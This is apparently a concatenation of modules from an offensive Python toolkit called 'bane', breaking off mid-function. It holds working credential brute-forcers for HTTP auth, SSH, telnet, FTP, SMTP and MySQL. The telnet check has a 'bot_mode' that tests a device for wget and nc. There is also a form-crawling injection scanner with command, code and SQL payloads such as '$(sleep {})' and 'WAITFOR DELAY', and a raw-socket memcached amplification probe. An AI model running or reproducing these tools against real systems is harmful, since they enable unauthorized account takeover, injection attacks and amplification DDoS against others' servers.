from bane.bruteforce.utils import *

class http_auth_bruteforce:
    __slots__ = ["logs", "stop", "finish", "result"]

    def __init__(
        self,
        u,
        word_list=[],
        threads_daemon=True,
        logs=True,
        domain=None,
        proxy=None,
        proxies=None,
        cookie=None,
        user_agent=None,
        timeout=10,
        headers={}
    ):
        self.stop = False
        self.logs = logs
        self.finish = False
        self.result = {}
        t = threading.Thread(
            target=self.crack,
            args=(
                u,
                domain,
                word_list,
                logs,
                proxy,
                proxies,
                cookie,
                user_agent,
                timeout,
                headers,
            ),
        )
        t.daemon = threads_daemon
        t.start()

    def done(self):
        return self.finish

    def crack(
        self, u, domain, word_list, logs, proxy, proxies, cookie, user_agent, timeout,headers
    ):
        if user_agent:
            us = user_agent
        else:
            us = random.choice(ua)
        hed = {"User-Agent": us}
        if cookie:
            hed.update({"Cookie": cookie})
        hed.update(headers)
        prox = None
        if proxy:
            prox = proxy#{"http": "http://" + proxy, "https": "http://" + proxy}
        if proxies:
            prox = random.choice(proxies)
            #prox = {"http": "http://" + prox, "https": "http://" + prox}
        try:
            if self.logs == True:
                print("[*]Checking Authentication Type:")
            resp = requests.get(
                u, proxies=prox, headers=hed, verify=False, timeout=timeout
            )
            if "basic" in resp.headers["WWW-Authenticate"].lower():
                if self.logs == True:
                    print("==>Basic")
                auth_type = requests.auth.HTTPBasicAuth
            elif "digest" in resp.headers["WWW-Authenticate"].lower():
                if self.logs == True:
                    print("==>Digest")
                auth_type = requests.auth.HTTPDigestAuth
                """elif 'ntlm' in resp.headers['WWW-Authenticate'].lower():
    if self.logs==True:
     print("==>Ntlm")
    auth_type = requests_ntlm.HttpNtlmAuth
    if not domain:
     raise Exception('You need to specify a domain for "Ntlm" authentication !\n\nbane.http_auth_bruteforce("http://example.com",domain="example.com",.....)')"""
            else:
                if self.logs == True:
                    print("==>Unknown type")
                self.finish = True
                return
        except:
            if self.logs == True:
                print("bane doesn't support this type of authentication")
            self.finish = True
            return
        for x in word_list:
            try:
                if self.stop == True:
                    self.finish = True
                    break
                username = x.split(":")[0]
                """if domain and auth_type==requests_ntlm.HttpNtlmAuth:
     username=domain+'\\'+username"""
                password = x.split(":")[1]
                if self.logs == True:
                    print("[*]Trying: {} {}".format(username, password))
                prox = None
                if proxies:
                    prox = random.choice(proxies)
                if user_agent:
                    us = user_agent
                else:
                    us = random.choice(ua)
                hed = {"User-Agent": us}
                if cookie:
                    hed.update({"Cookie": cookie})
                r = requests.get(
                    u,
                    auth=auth_type(username, password),
                    proxies=prox,
                    headers=hed,
                    verify=False,
                    timeout=timeout,
                )
                if (
                    (r.status_code == 200)
                    and ("required" not in r.text.lower())
                    and ("wrong" not in r.text.lower())
                    and ("invalid" not in r.text.lower())
                    and ("denied" not in r.text.lower())
                    and ("unauthorized" not in r.text.lower())
                ):
                    if self.logs == True:
                        print("[+]Success")
                    self.result = {u: username + ":" + password}
                    self.finish = True
                    break
                else:
                    if self.logs == True:
                        print("[-]Fail")
            except Exception as ex:
                if self.logs == True:
                    print("[-]Fail")
        self.finish = True



from bane.cryptographers.base64 import *
from bane.cryptographers.caesar import *
from bane.cryptographers.md5 import *
from bane.cryptographers.sha1 import *
from bane.cryptographers.sha224 import *
from bane.cryptographers.sha256 import *
from bane.cryptographers.sha384 import *
from bane.cryptographers.sha512 import *
from bane.cryptographers.xor import *


from bane.bruteforce.admin_panel_finder import *
from bane.bruteforce.decrypt import *
from bane.bruteforce.filemanager_finder import *
from bane.bruteforce.force_browsing import *
from bane.bruteforce.http_auth import *
from bane.bruteforce.hydra import *
from bane.bruteforce.web_login import *


from bane.scanners.vulnerabilities.utils import *


def shodan_report(ip, api_key, file_name="shodan_report",save_to_file=False):
    u = "https://api.shodan.io/shodan/host/{}?key={}".format(ip, api_key)
    try:
        r = requests.get(u, headers={"User-Agent": random.choice(ua)}).text
        if save_to_file==True:
            with open(file_name.split(".")[0] + ".json", "w") as outfile:
                json.dump(json.loads(r), outfile, indent=4)
            outfile.close()
        return json.loads(r)
    except:
        return {}




import requests, random, json, sys,socket
import urllib3,time
from bane.scanners.vulnerabilities.vulns import vulners_search,sniffable_links,page_clickjacking
from bane.gather_info.info_s import get_subdomains,extract_root_domain

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from bane.common.payloads import ua

if sys.version_info < (3, 0):
    from urlparse import urlparse
else:
    from urllib.parse import urlparse

from bs4 import BeautifulSoup



from bane.bruteforce.utils import *
"""
  the next functions are used to check the login credentials you provide, it can be used for bruteforce attacks.

  it returns True if the given logins, else it returns False.

  example:

  >>>host='125.33.32.11'
  >>>wordlist=['admin:admin','admin123:admin','user:password']
  >>>for x in wordlist:
      user=x.split(':')[0]
      pwd=x.split(':')[1]
      print '[*]Trying:',user,pwd
      if bane.telnet(host,username=user,password=pwd)==True:
       print'[+]Found!!!'
      else:
       print'[-]Failed'

"""


def smtp(u, username, password, p=25, ehlo=True, helo=False, ttls=False):
    try:
        s = smtplib.SMTP(u, p)  # connect to smtp server
        if ehlo == True:
            s.ehlo()  # ehlo
            if ttls == True:
                s.starttls()  # ttls
        if helo == True:
            s.helo()  # helo
            if ttls == True:
                s.starttls()
        s.login(username, password)
        return True
    except Exception as e:
        pass
    return False


def telnet(u, username, password, p=23, timeout=5, bot_mode=False):
    try:
        t = xtelnet.session()
        t.connect(u, username=username, password=password, p=p, timeout=timeout)
        if bot_mode == True:
            a = t.execute("busybox")
        t.destroy()
        if bot_mode == True:
            if "wget" in a or "nc" in a:
                return True
            return False
        return True
    except:
        pass
    return False


# why i used this code for ssh brute force instead of: pexpext/paramiko ? Well pexpect doesn't work on non-linux machines and paramiko gives a huuuuge number of false positive results ! you will see, with this code there is no false positive brute force ;)


def ssh(u, username, password, p=22, timeout=5, exchange_key=None):
    if os.name == "nt":
        if exchange_key != None:  # this doesn't work on windows for some reason :(
            return False
        l = 'echo y | plink -ssh -l {} -pw {} {} -P {} "hvbjkjk"'.format(
            username, password, u, p
        )
        sshp = subprocess.Popen(
            l.split(),
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            shell=True,
        )
    else:
        if exchange_key:
            key = "-oHostKeyAlgorithms=+" + exchange_key
        else:
            key = ""
        l = "sshpass -p {} ssh {} -p {} -o StrictHostKeyChecking=no -l {} {} 'exithg'".format(
            password, key, p, username, u
        )  # we use the sshpass command to send the password
        sshp = subprocess.Popen(
            l.split(),
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
    ti = time.time()
    while sshp.poll() is None:
        time.sleep(0.1)
        # print(ssh.stdout.readlines())
        if int(time.time() - ti) == timeout:
            try:
                sshp.kill()
            except:
                pass
            return False
    ou = sshp.communicate()
    try:
        sshp.kill()
    except:
        pass
    time.sleep(0.1)
    if exchange_key == None:
        if "Their offer:" in ou[1].decode("utf-8"):
            if os.name == "nt":
                return False
            k = ou[1].decode("utf-8").split("offer:")[1].strip()
            return ssh(u, username, password, p=p, timeout=timeout, exchange_key=k)
    if "Server refused to start a shell/command" in ou[1].decode("utf-8"):
        return True
    if (
        ("unsupported" in ou[1].decode("utf-8").lower())
        or ("denied" in ou[1].decode("utf-8").lower())
        or ("FATAL ERROR" in ou[1].decode("utf-8"))
        or ("refused" in ou[1].decode("utf-8").lower())
        or ("Unsupported KEX algorithm" in ou[1].decode("utf-8"))
        or ("Bad SSH2 KexAlgorithms" in ou[1].decode("utf-8"))
    ):
        return False
    else:
        return True


def ftp_anon(ip, timeout=5):
    # anonymous ftp login
    try:
        ftp = FTP(ip, timeout=timeout)
        ftp.login()
        return True
    except Exception as e:
        pass
    return False


def ftp(ip, username, password, timeout=5):
    try:
        i = False
        ftp = FTP(ip, timeout=timeout)
        ftp.login(username, password)
        return True
    except Exception as e:
        pass
    return False


def mysql(u, username, password, timeout=5, p=3306):
    try:
        s=pymysql.connect(host=u,port=p,user=username,password=password,connect_timeout=timeout)
        s.close()
        return True
    except Exception as e:
        pass
    return False


class hydra:
    __slots__ = ["stop", "finish", "result", "logs"]

    def __init__(
        self,
        u,
        p=22,
        protocol="ssh",
        word_list=[],
        threads_daemon=True,
        logs=True,
        exchange_key=None,
        timeout=5,
        ehlo=False,
        helo=True,
        ttls=False,
        proxy=None,
        proxies=None,
        user_agent=None,
        cookie=None,
        headers={}
    ):
        """
        this function is similar to hydra tool to bruteforce attacks on different ports.

        protocol: (set by default to: ssh) set the chosen protocol (ftp, ssh, telnet, smtp and mysql) and don't forget to set the port."""
        self.logs = logs
        self.stop = False
        self.finish = False
        self.result = {}
        t = threading.Thread(
            target=self.crack,
            args=(
                u,
                p,
                protocol,
                word_list,
                logs,
                exchange_key,
                timeout,
                ehlo,
                helo,
                ttls,
                proxy,
                proxies,
                user_agent,
                cookie,
                headers,
            ),
        )
        t.daemon = threads_daemon
        t.start()

    def crack(
        self,
        u,
        p,
        protocol,
        word_list,
        logs,
        exchange_key,
        timeout,
        ehlo,
        helo,
        ttls,
        proxy,
        proxies,
        user_agent,
        cookie,
        headers
    ):
        o = ""
        if protocol == "telnet":
            s = telnet
        if protocol == "ssh":
            s = ssh
        if protocol == "ftp":
            s = ftp
        if protocol == "smtp":
            s = smtp
        if protocol == "mysql":
            s = mysql
        if protocol == "wp":
            s = wpadmin
        for x in word_list:
            if self.stop == True:
                break
            user = x.split(":")[0].strip()
            pwd = x.split(":")[1].strip()
            if self.logs == True:
                print("[*]Trying ==> {}:{}".format(user, pwd))
            if protocol == "ssh":
                r = s(u, user, pwd, timeout=timeout, p=p, exchange_key=exchange_key)
            elif protocol == "telnet":
                r = s(u, user, pwd, timeout=timeout, p=p)
            elif protocol == "mysql":
                r = s(u, user, pwd, timeout=timeout, p=p)
            elif protocol == "ftp":
                r = s(u, user, pwd, timeout=timeout)
            elif protocol == "wp":
                if proxy:
                    proxy = proxy
                if proxies:
                    proxy = random.choice(proxies)
                r = s(
                    u,
                    user,
                    pwd,
                    proxy=proxy,
                    user_agent=user_agent,
                    cookie=cookie,
                    timeout=timeout,
                    headers=headers
                )
            elif protocol == "smtp":
                r = s(u, p, user, pwd, ehlo=ehlo, helo=helo, ttls=ttls)
            else:
                r = s(u, user, pwd, timeout=timeout)
            if r == True:
                if self.logs == True:
                    print("[+]Found!!!")
                o = "{}:{}".format(user, pwd)
                break
            else:
                if self.logs == True:
                    print("[-]Failed")
        self.result = {u: o}
        self.finish = True





from bane.scanners.vulnerabilities.utils import *

def exposed_telnet(u, p=23, timeout=5):
    try:
        t = xtelnet.session()
        t.connect(u, p=p, timeout=timeout)
        t.destroy()
        return True
    except:
        pass
    return False




from bane.gather_info.utils import *



def norton_rate(u, timeout=30, proxy=None):
    """
    this function takes any giving and gives a security report from: safeweb.norton.com, if it is a: spam domain, contains a malware...
    it takes 3 arguments:
    u: the link to check
    logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False
    returning: (set by default to: False) returning the report as a string format if it is set to: True.
    usage:
    >>>import bane
    >>>url='http://www.example.com'
    >>>bane.norton_rate(domain)"""
    try:
        ur = urllib.quote(u, safe="")
        ul = "https://safeweb.norton.com/report/show?url=" + ur
        c = requests.get(
            ul,
            headers={"User-Agent": random.choice(ua)},
            proxies=proxy,
            timeout=timeout,
        ).text
        soup = BeautifulSoup(c, "html.parser")
        s = soup.find_all("div", class_="communityRatings")
        s = remove_html_tags(str(s[0])).strip().split("\n")
        while "" in s:
            s.remove("")
        try:
            return {"Profile": s[0], "Rate": float(s[1]), "By": s[2]}
        except:
            return {"Profile": s[0], "Rate": float(s[1])}
    except:
        pass


def http_options(
    u,
    timeout=10,
    user_agent=None,
    cookie=None,
    extra_headers=None,
    logs=True,
    returning=False,
    proxy=None,
):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    if extra_headers:
        heads.update(extra_headers)
    try:
        s = requests.session()
        a = s.options(u, headers=heads, proxies=proxy, timeout=timeout).headers
    except Exception as ex:
        return []
    b = []
    if "Access-Control-Allow-Methods" in a:
        b += [x.strip() for x in a["Access-Control-Allow-Methods"].split(",")]
    if "Allow" in a:
        b += [x.strip() for x in a["Allow"].split(",")]
    return b


def headers(
    u,
    timeout=10,
    user_agent=None,
    cookie=None,
    extra_headers=None,
    logs=True,
    returning=False,
    proxy=None,
):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    if extra_headers:
        heads.update(extra_headers)
    try:
        #"safe": sec,
        s = requests.session()
        a = s.get(u, headers=heads, proxies=proxy, timeout=timeout).headers
    except Exception as ex:
        return None
    if logs == True:
        for x in a:
            print("{} : {}".format(x, a[x]))
    if returning == True:
        return a


def webhint_report(ur, proxy=None, timeout=10):
    """
    this function takes any webpage link and returns a report link from webhint.io."""
    u = "https://webhint.io/scanner/"
    r = ""
    if "://" not in ur:
        return r
    try:
        s = requests.session()
        s.get(u, proxies=proxy, timeout=timeout)
        data = {"url": ur}
        a = s.post(u, data, proxies=proxy, timeout=timeout).text
        soup = BeautifulSoup(a, "html.parser")
        s = soup.find_all("span", class_="permalink-content")
        for x in s:
            try:
                r = x.a["href"]
            except Exception as ex:
                pass
    except Exception as e:
        pass
    return r




from bane.scanners.vulnerabilities.utils import *

def rce_submit(
    parsed,
    payload,
    based_on,
    replaceble_parameters,
    debug=False,
    enctype="application/x-www-form-urlencoded",
    type_injection="code",
):
    """"""
    p_o_c=parsed[0].copy()
    d, fi = setup_to_submit(parsed[0])
    for x in d:
        for y in replaceble_parameters:
            if x == y:
                for z in replaceble_parameters[y]:
                    d[x] = d[x].replace(z[0], z[1])
    if debug == True:
        for x in d:
            print("{}{} : {}{}".format(Fore.MAGENTA, x, Fore.WHITE, d[x]))
        for x in fi:
            print("{}{} : {}{}".format(Fore.MAGENTA, x, Fore.WHITE, fi[x]))
    if "application/json" in enctype:
        d = json.dumps(d)
    t = time.time()
    if not fi:
        parsed[1].update(
            {
                "Content-Type": enctype,
                "Referer": parsed[0]["action"],
                "Origin": parsed[0]["action"].split("://")[0]
                + "://"
                + parsed[0]["action"].split("://")[1].split("/")[0],
            }
        )
    else:
        parsed[1].update(
            {
                "Referer": parsed[0]["action"],
                "Origin": parsed[0]["action"].split("://")[0]
                + "://"
                + parsed[0]["action"].split("://")[1].split("/")[0],
            }
        )
    c=''
    if parsed[0]["method"] == "get":
        try:
            c = requests.get(
                parsed[0]["action"],
                params=d,
                headers=parsed[1],
                proxies=parsed[2],
                timeout=parsed[3],
                verify=False,
            )
            if based_on[0] == "file":
                c = requests.get(
                    parsed[0]["action"].replace(
                        parsed[0]["action"].split("/")[-1], based_on[1] + ".txt"
                    ),
                    params=d,
                    headers=parsed[1],
                    proxies=parsed[2],
                    timeout=parsed[3],
                    verify=False,
                )
                if (c.status_code == 200) and (len(c.text) == 0):
                    return (
                        True,
                        {"reflection":parsed[0]["action"].replace(
                            parsed[0]["action"].split("/")[-1], based_on[1]
                        )
                        + ".txt","p_o_c":p_o_c},
                        any(s in c.text for s in sql_errors),
                        any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c
                    )
            if based_on[0] == "time":
                if type_injection == "command":
                    if (int(time.time() - t) >= based_on[1] - 2) or (
                        c.status_code == 504
                    ):
                        return (True, {"p_o_c":p_o_c},any(s in c.text for s in sql_errors),any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c)
                else:
                    if (int(time.time() - t) >= based_on[1]) or (c.status_code == 504):
                        return (True, {"p_o_c":p_o_c},any(s in c.text for s in sql_errors),any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c)
        except Exception as e:
            #print(str(e))
            if "Read timed out" in str(e):
                #if based_on[0] == "time":
                    return (True, {"p_o_c":p_o_c},False,False,False,False)
    else:
        try:
            c = requests.post(
                parsed[0]["action"],
                data=d,
                files=fi,
                headers=parsed[1],
                proxies=parsed[2],
                timeout=parsed[3],
                verify=False,
            )
            if based_on[0] == "file":
                c = requests.get(
                    parsed[0]["action"].replace(
                        parsed[0]["action"].split("/")[-1], based_on[1] + ".txt"
                    ),
                    params=d,
                    headers=parsed[1],
                    proxies=parsed[2],
                    timeout=parsed[3],
                    verify=False,
                )
                if (c.status_code == 200) and (len(c.text) == 0):
                    return (
                        True,
                        {"reflection":parsed[0]["action"].replace(
                            parsed[0]["action"].split("/")[-1], based_on[1]
                        )
                        + ".txt","p_o_c":p_o_c},
                        any(s in c.text for s in sql_errors),
                        any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c
                    )
            if based_on[0] == "time":
                if (int(time.time() - t) >= based_on[1] - 2) or (c.status_code == 504):
                    return (True, {"p_o_c":p_o_c},any(s in c.text for s in sql_errors),any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c)
                else:
                    if (int(time.time() - t) >= based_on[1]) or (c.status_code == 504):
                        return (True, {"p_o_c":p_o_c},any(s in c.text for s in sql_errors),any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c)
        except Exception as e:
            #print(str(e))
            if "Read timed out" in str(e):
                #if based_on[0] == "time":
                    return (True, {"p_o_c":p_o_c},any(s in c.text for s in sql_errors),any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c)
    return (False, "",any(s in c.text for s in sql_errors),any(s in c.text for s in xml_parser_errors),any(s in c.text for s in fetch_url_errors),any(s in c.text for s in open_file_errors),p_o_c)


def rce_forms(
    u,
    payload_index=0,
    save_to_file=None,
    dont_change={},
    number=(1, 9),
    email_extension='@gmail.com',
    phone_pattern='XXX-XXX-XXXX',
    injection={"code": "php"},
    code_operator_right="; ",
    code_operator_left="",
    command_operator_right="|",
    command_operator_left="&",
    sql_operator_right="or '",
    sql_operator_left="' or ",
    file_extension="png",
    replaceble_parameters={"phpvalue": ((".", ""),)},
    based_on="time",
    delay=10,
    logs=True,
    fill_empty=10,
    leave_empty=[],
    dont_send=["btnClear"],
    proxy=None,
    proxies=None,
    timeout=120,
    user_agent=None,
    cookie=None,
    debug=False,
    mime_type=None,
    predefined_inputs={},
    headers={}
):
    """
    this function is for RCE test with both POST and GET requests. it extracts the input fields names using the "inputs" function then test each input using POST and GET methods.

    usage:

    >>>import bane
    >>>bane.rce_forms('http://phptester.net/")

    """
    payloads = {
        "command": {
            "linux": {
                "file": ["touch {}.txt", "`touch {}.txt`", "$(touch {}.txt)"],
                "time": ["sleep {}", "`sleep {}`", "$(sleep {})"],
            },
            "windows": {"file": ["copy nul {}.txt"], "time": ["ping -n {} 127.0.0.1"]},
        },
        "code": {
            "python": {
                "file": [" open('{}.txt', 'w') "],
                "time": [" __import__('time').sleep({}) "],
            },
            "php": {
                "file": [" file_put_contents('{}.txt', '') "],
                "time": [" sleep({}) "],
            },
            "ruby": {"file": [' File.new("{}.txt", "w") '], "time": [" sleep({}) "]},
            "perl": {
                "file": [' open ( my $fh, ">", "{}.txt") '],
                "time": [" sleep({}) "],
            },
            "js": {
                "file": [" require('fs').createWriteStream('{}.txt', {flags: 'w'})  "],
                "time": [
                    " (function wait(ms){var start = new Date().getTime();var end = start;while(end < start + ms) {end = new Date().getTime();}})({}*1000) ",
                    " await (function wait(ms){var start = new Date().getTime();var end = start;while(end < start + ms) {end = new Date().getTime();}})({}*1000) ",
                ],
            },
        },
        "sql": {
            "mysql": {"time": [" sleep({}) "]},
            "oracle": {"time": [" dbms_lock.sleep({}) "]},
            "postgre": {"time": [" pg_sleep({}) "]},
            "sql_server": {"time": [" WAITFOR DELAY '00:00:{}' "]},
        },
    }
    target_page = u
    xp = ""
    based_on_o = based_on
    if list(injection.keys())[0] == "command":
        xp += command_operator_left
        inject_type = list(injection.keys())[0]
        inject_target = injection[inject_type]
        xp += payloads[inject_type.lower()][inject_target.lower()][based_on.lower()][
            payload_index
        ]
        if based_on_o.lower() == "file":
            based_on = ("file", random_string(random.randint(3, 10)))
        else:
            based_on = ("time", int(delay) + 2)
        xp = xp.format(based_on[1])
        xp += command_operator_right
    elif list(injection.keys())[0] == "code":
        xp += code_operator_left
        inject_type = list(injection.keys())[0]
        inject_target = injection[inject_type]
        xp += payloads[inject_type.lower()][inject_target.lower()][based_on.lower()][
            payload_index
        ]
        if based_on_o.lower() == "file":
            based_on = ("file", random_string(random.randint(3, 10)))
        else:
            based_on = ("time", int(delay))
        xp = xp.format(based_on[1])
        xp += code_operator_right
    else:
        xp += sql_operator_left
        inject_type = list(injection.keys())[0]
        inject_target = injection[inject_type]
        xp += payloads[inject_type.lower()][inject_target.lower()][based_on.lower()][
            payload_index
        ]
        if based_on_o.lower() == "file":
            based_on = ("file", random_string(random.randint(3, 10)))
        else:
            based_on = ("time", int(delay))
        xp = xp.format(based_on[1])
        xp += sql_operator_right
    target_page = u
    form_index = -1
    if proxy:
        proxy = proxy
    if proxies:
        proxy = random.choice(proxies)
    dic = []
    if logs == True:
        print(Fore.WHITE + "[~]Getting forms..." + Style.RESET_ALL)
    hu = True
    fom = forms_parser(
        u, proxy=proxy, timeout=timeout, cookie=cookie, user_agent=user_agent,include_links=True,headers=headers
    )
    if len(fom) == 0:
        if logs == True:
            print(Fore.RED + "[-]No forms were found!!!" + Style.RESET_ALL)
        hu = False
    if hu == True:
        for l1 in fom:
            form_index += 1
            lst = {}
            sql_e=[]
            xml_e=[]
            p_t_e=[]
            ssrf_e=[]
            p_t_erros=[]
            ssrf_errors=[]
            vul = []
            sec = []
            hu = True
            u = l1["action"]
            if logs == True:
                print(
                    Fore.BLUE
                    + "Form: "
                    + Fore.WHITE
                    + str(form_index)
                    + Fore.BLUE
                    + "\nAction: "
                    + Fore.WHITE
                    + u
                    + Fore.BLUE
                    + "\nMethod: "
                    + Fore.WHITE
                    + l1["method"]
                    + Fore.BLUE
                    + "\nPayload: "
                    + Fore.WHITE
                    + xp.replace(
                        " {} ".format(int(delay) + 2), " {} ".format(int(delay))
                    )
                    + Style.RESET_ALL
                )
                """if len(inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent))==0:
     if logs==True:
      print(Fore.YELLOW+"[-]No parameters found on that page !! Moving on.."+Style.RESET_ALL)"""
            if True:
                extr = []
                l = []
                for x in l1["inputs"]:
                    if (
                        x["name"].strip() not in leave_empty
                        and x["name"].strip() not in dont_send
                    ):
                        try:
                            if (
                                x["type"]
                                in [
                                    "hidden",
                                    "file",
                                    "text",
                                    "textarea",
                                    "email",
                                    "tel",
                                    "search",
                                    "url",
                                    "password",
                                    "number",
                                    "select",
                                    "radio",
                                    "checkbox",
                                    "color"
                                ]
                                and x["name"] not in dont_change
                            ):  # any input type that accept direct input from keyboard
                                i = x["name"]
                                parsed_form = set_up_injection(
                                    target_page,
                                    form_index,
                                    i,
                                    xp,
                                    cookie,
                                    setup_ua(user_agent),
                                    setup_proxy(proxy, proxies),
                                    timeout,
                                    fill_empty,
                                    file_extension=file_extension,
                                    number=number,
                                    email_extension=email_extension,
                                    phone_pattern=phone_pattern,
                                    leave_empty=leave_empty,
                                    dont_send=dont_send,
                                    mime_type=mime_type,
                                    predefined_inputs=predefined_inputs,
                                    dont_change=dont_change,
                                    headers=headers
                                )
                                _res = rce_submit(
                                    parsed_form,
                                    xp,
                                    based_on,
                                    replaceble_parameters,
                                    debug=debug,
                                    enctype=l1["enctype"],
                                    type_injection=list(injection.keys())[0],
                                )
                                if _res[0] == True:
                                    x = "parameter: '" + i + "' => [+] Vulnerable !!"
                                    vul.append({'parameter':i, 'context': _res[1]})
                                    colr = Fore.GREEN
                                else:
                                    x = "parameter: '" + i + "' => [-] Not Vulnerable"
                                    #sec.append(i)
                                    colr = Fore.RED
                                if _res[2] == True:
                                    x+=Fore.YELLOW+"\n[i] SQL Error detected"
                                    sql_e.append({'parameter':i, 'p_o_c': _res[-1]})
                                if _res[3]==True:
                                    x+=Fore.YELLOW+"\n[i] XML parsing Error detected"
                                    xml_e.append({'parameter':i, 'p_o_c': _res[-1]})
                                if _res[4] == True:
                                    x+=Fore.YELLOW+"\n[i] Fetching URL Error detected (potential SSRF)"
                                    ssrf_e.append({'parameter':i, 'p_o_c': _res[-1]})
                                if _res[5] == True:
                                    x+=Fore.YELLOW+"\n[i] Reading file Error detected (potential path traversal)"
                                    p_t_e.append({'parameter':i, 'p_o_c': _res[-1]})
                                if logs == True:
                                    print(colr + x + Style.RESET_ALL)
                        except Exception as ex:
                            pass#raise(ex)
            dic.append(
                {
                    "action": u,
                    "method": l1["method"],
                    "vulnerable": vul,
                    #"safe": sec,
                    "sql_errors":sql_e,
                    "xml_parsing_errors":xml_e,
                    "fetching_url_errors":ssrf_e,
                    "reading_file_errors":p_t_e
                }
            )
        if based_on_o == "time":
            final = {
                "payload": xp.replace(
                    " {} ".format(int(delay) + 2), " {} ".format(int(delay))
                ),
                "based_on": based_on_o,
                "injection": injection,
                "page": target_page,
                "result": dic,
            }
        else:
            final = {
                "payload": xp,
                "based_on": based_on_o,
                "injection": injection,
                "page": target_page,
                "result": dic,
            }
        if save_to_file:
            with open(save_to_file.split(".")[0] + ".json", "w") as outfile:
                json.dump(final, outfile, indent=4)
            outfile.close()
        return final



def rce(
    u,
    max_pages=5,
    pages=[],
    payload_index=0,
    email_extension='@gmail.com',
    phone_pattern='XXX-XXX-XXXX',
    save_to_file=None,
    dont_change={},
    number=(1, 9),
    injection={"code": "php"},
    code_operator_right="; ",
    code_operator_left="",
    command_operator_right="|",
    command_operator_left="&",
    sql_operator_right="or '",
    sql_operator_left="' or ",
    file_extension="png",
    replaceble_parameters={"phpvalue": ((".", ""),)},
    based_on="time",
    delay=10,
    logs=True,
    fill_empty=10,
    leave_empty=[],
    dont_send=["btnClear"],
    proxy=None,
    proxies=None,
    timeout=120,
    user_agent=None,
    cookie=None,
    debug=False,
    mime_type=None,
    predefined_inputs={},
    headers={}
):
    l=[]
    if pages==[]:
        pages=spider_url(u,cookie=cookie,max_pages=max_pages,timeout=timeout,user_agent=user_agent,proxy=proxy,headers=headers)
    for x in pages:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        l.append(rce_forms(x,
                            payload_index=payload_index,
                            save_to_file=save_to_file,
                            dont_change=dont_change,
                            number=number,
                            email_extension=email_extension,
                            phone_pattern=phone_pattern,
                            injection=injection,
                            code_operator_right=code_operator_right,
                            code_operator_left=code_operator_left,
                            command_operator_right=command_operator_right,
                            command_operator_left=command_operator_left,
                            sql_operator_right=sql_operator_right,
                            sql_operator_left=sql_operator_left,
                            file_extension=file_extension,
                            replaceble_parameters=replaceble_parameters,
                            based_on=based_on,
                            delay=delay,
                            logs=logs,
                            fill_empty=fill_empty,
                            leave_empty=leave_empty,
                            dont_send=dont_send,
                            proxy=proxy,
                            proxies=proxies,
                            timeout=timeout,
                            user_agent=user_agent,
                            cookie=cookie,
                            debug=debug,
                            mime_type=mime_type,
                            predefined_inputs=predefined_inputs,
                            headers=headers))
    f=[]
    for x in l:
        if x !=None:
            n=x.copy()
            n['result']=[]
            for i in x['result']:
                if len(i['vulnerable']) > 0 or len(i['sql_errors']) > 0 or len(i['xml_parsing_errors'])>0 or len(i['fetching_url_errors'])>0 or len(i['reading_file_errors']) > 0:
                    n['result'].append(i)
            if n['result']!=[]:
                f.append(n)
    return f





from bane.scanners.vulnerabilities.utils import *

def vulners_search(
    software,
    url="https://vulners.com/api/v3/burp/software/",
    file_name="",
    save_to_file=False,
    max_vulnerabilities=100,
    version="",
    software_type="software",
    user_agent=None,
    cookie=None,
    api_key='',
    proxy=None,
    timeout=20,
):
    if not file_name:
        if version:
            file_name = software + "_" + version.replace(".", "-")
        else:
            file_name = software
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    try:
        ver = ""
        if version:
            ver = version
        max_vuln = 100
        if max_vulnerabilities:
            max_vuln = max_vulnerabilities
        ty = "software"
        if software_type:
            ty = software_type
        if ty not in ["software", "cpe"]:
            raise Exception('type must be: "software" or "cpe"')
        d = {
            "maxVulnerabilities": max_vuln,
            "version": ver,
            "type": ty,
            "software": software,
            'apikey':api_key
        }
        r = requests.get(
            url,
            params=d,
            headers=hea,
            proxies=proxy,
            timeout=timeout,
            verify=False,
        )
        c = json.loads(r.text)
        if c["result"] == "OK":
            if save_to_file==True:
                with open(file_name.split(".")[0] + ".json", "w") as outfile:
                    json.dump(c, outfile, indent=4)
                outfile.close()
            l = []
            m = c["data"]["search"]
            i = 0
            for x in m:
                #print(x)
                l.append(
                     x[
                            "_source"
                        ]
                )
                i += 1
            return l
        else:
            return {'error':"couldn't find vulnerabilities for this version"}
    except:
        pass
    return []



from bane.scanners.network_protocols.utils import *



def memcache_factor(u, timeout=3):
    """
calculate the amplification factor for any given memcache server
 """

 # creating the payload

    req = IP(dst=u) / UDP(sport=random.randint(1025, 65500),
                          dport=11211) \
        / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n')
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW,
                      socket.IPPROTO_UDP)  # creating a raw socket
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    s.sendto(bytes(req), (u, 11211))
    s.settimeout(timeout)  # set timeout
    d = ''
    while True:
        try:
            o = ''
            o += str(s.recv(4096))
        except KeyboardInterrupt:
